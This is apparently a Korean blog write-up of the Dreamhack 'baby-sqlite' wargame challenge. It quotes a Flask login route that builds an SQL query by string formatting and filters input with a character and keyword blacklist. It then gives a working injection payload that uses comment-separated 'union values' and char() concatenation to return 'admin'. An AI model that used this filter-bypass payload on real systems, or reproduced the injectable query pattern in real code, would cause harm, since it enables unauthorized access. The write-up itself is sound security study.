개발세발보안중
baby-sqlite 본문
https://dreamhack.io/wargame/challenges/1]
with app.app_context():
conn = get_db()
query = f"SELECT uid FROM users WHERE uid='{uid}' and upw='{upw}' and level={level};"
try:
req = conn.execute(query)
result = req.fetchone()
if result is not None:
uid = result[0]
if uid == 'admin':
return FLAG
except:
return 'Error!'
return 'Good!'Result가 admin이면 Flag값이 나온다
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'GET':
return render_template('login.html')
uid = request.form.get('uid', '').lower()
upw = request.form.get('upw', '').lower()
level = request.form.get('level', '9').lower()
sqli_filter = ['[', ']', ',', 'admin', 'select', '\'', '"', '\t', '\n', '\r', '\x08', '\x09', '\x00', '\x0b', '\x0d', ' ']
for x in sqli_filter:
if uid.find(x) != -1:
return 'No Hack!'
if upw.find(x) != -1:
return 'No Hack!'
if level.find(x) != -1:
return 'No Hack!'filtering이 되어 입력받은 값이 모두 소문자 처리되고 필터링이 된다
level의 값은 기본으로 9를 가진다
login page에는 uid와upw입력박스만 있어서 html코드를 입력하여 <input type="submint"/> level박스를 만들어준다.
SELECT uid FROM users WHERE uid='a' and upw='a' and level=9 union values('admin');
level 칸에 다음 코드를 입력한다
9/**/union/**/values(char(0x61)||char(0x64)||char(0x6d)||char(0x69)||char(0x6e))
'CTF' 카테고리의 다른 글
| Broken Password (0) | 2023.10.04 |
|---|---|
| login -1 (0) | 2023.10.04 |
| file-special-bit (0) | 2023.09.27 |
| welcome (0) | 2023.09.27 |
| Command Injection Advanced (0) | 2023.09.27 |
'CTF' Related Articles
more
Comments